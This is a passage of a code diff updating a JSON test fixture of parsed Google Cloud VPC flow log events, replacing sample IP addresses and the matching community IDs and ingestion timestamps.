"2019-06-14T03:40:20.569744903Z", @@ -4960,9 +4960,9 @@ "as": { "number": 45899 }, - "address": "192.0.2.165", + "address": "192.168.2.165", "port": 59623, - "ip": "192.0.2.165" + "ip": "192.168.2.165" }, "source": { "address": "10.139.99.242", @@ -4976,7 +4976,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:n2izIhQ6f30pRxm58NLCxNXryuI=", + "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", "bytes": 2395, "transport": "tcp", "type": "ipv4", @@ -4991,7 +4991,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.165" + "192.168.2.165" ] }, "gcp": { @@ -5015,8 +5015,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868594500Z", - "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.0.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391427700Z", + "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.168.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:46.541094678Z", "end": "2019-06-14T03:40:52.361155668Z", @@ -5043,18 +5043,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33558, "bytes": 60335, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 353 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:dH+LewCyUH2MeBfvw4hfqQCcruA=", + "community_id": "1:OXveH9jdApjuJYvfxS0cJZ8eAbI=", "bytes": 60335, "name": "default", "transport": "tcp", @@ -5076,7 +5076,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -5113,8 +5113,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868599600Z", - "original": "{\"insertId\":\"1ulp77rfdvho5y\",\"jsonPayload\":{\"bytes_sent\":\"60335\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.538257098Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391432100Z", + "original": "{\"insertId\":\"1ulp77rfdvho5y\",\"jsonPayload\":{\"bytes_sent\":\"60335\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.538257098Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:58.492572765Z", "end": "2019-06-14T03:49:48.538257098Z", @@ -5135,10 +5135,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -5152,7 +5152,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jiDRQHDBdyhzib4qfhhB5Y0obik=", + "community_id": "1:if1o1IHC+FQXkxdlwDLZoOhwlFs=", "bytes": 65565, "name": "default", "transport": "tcp", @@ -5175,7 +5175,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -5211,8 +5211,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868603Z", - "original": "{\"insertId\":\"1ulp77rfdvho6a\",\"jsonPayload\":{\"bytes_sent\":\"65565\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"354\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391437100Z", + "original": "{\"insertId\":\"1ulp77rfdvho6a\",\"jsonPayload\":{\"bytes_sent\":\"65565\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"354\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", "end": "2019-06-14T03:49:59.565451051Z", @@ -5241,17 +5241,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65271, "bytes": 70174, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 717 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:32epFp/pi9XGVYf8FMJ7jpc0AzI=", + "community_id": "1:qv0hIE4qzHUK+++IYF3H4yaOdYA=", "bytes": 70174, "transport": "tcp", "type": "ipv4", @@ -5265,7 +5265,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -5290,8 +5290,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868606400Z", - "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391441700Z", + "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378070Z", "end": "2019-06-14T03:49:55.318940798Z", @@ -5318,17 +5318,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34178, "bytes": 1461, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bh7TlqiDrY8ste65CJNAKtfwOT0=", + "community_id": "1:ZAwMkhzg8iPFTne4VZtPZ10WSQw=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -5342,7 +5342,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -5367,8 +5367,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868609500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391445500Z", + "original": "{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:51.237256499Z", "end": "2019-06-14T03:46:51.355687385Z", @@ -5395,17 +5395,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33602, "bytes": 1460, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+QA68gzvBX6Rs13KKi5Sm666UiU=", + "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -5419,7 +5419,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -5444,8 +5444,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868612600Z", - "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391450100Z", + "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:45:50.954948790Z", "end": "2019-06-14T03:45:51.090104692Z", @@ -5472,18 +5472,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33554, "bytes": 66736, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 366 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:BbRNTmVcGaqf/baRzluKDpJAprQ=", + "community_id": "1:8vM4z84sXvUT94gexJfa2ZSNZ/c=", "bytes": 66736, "name": "default", "transport": "tcp", @@ -5505,7 +5505,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -5542,8 +5542,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868615700Z", - "original": "{\"insertId\":\"bnj3cofh3cdju\",\"jsonPayload\":{\"bytes_sent\":\"66736\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"366\",\"reporter\":\"DEST\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391454100Z", + "original": "{\"insertId\":\"bnj3cofh3cdju\",\"jsonPayload\":{\"bytes_sent\":\"66736\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"366\",\"reporter\":\"DEST\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", "end": "2019-06-14T03:49:59.565131125Z", @@ -5564,9 +5564,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33602, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -5580,7 +5580,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+QA68gzvBX6Rs13KKi5Sm666UiU=", + "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -5595,7 +5595,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -5619,8 +5619,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868620Z", - "original": "{\"insertId\":\"bnj3cofh3cdjz\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":33602,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391458200Z", + "original": "{\"insertId\":\"bnj3cofh3cdjz\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33602,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:45:50.954948790Z", "end": "2019-06-14T03:45:51.090104692Z", @@ -5647,17 +5647,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52454, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:x8E1sBwJRB/brRn7+TWuuDv6Seg=", + "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -5671,7 +5671,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -5696,8 +5696,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868623Z", - "original": 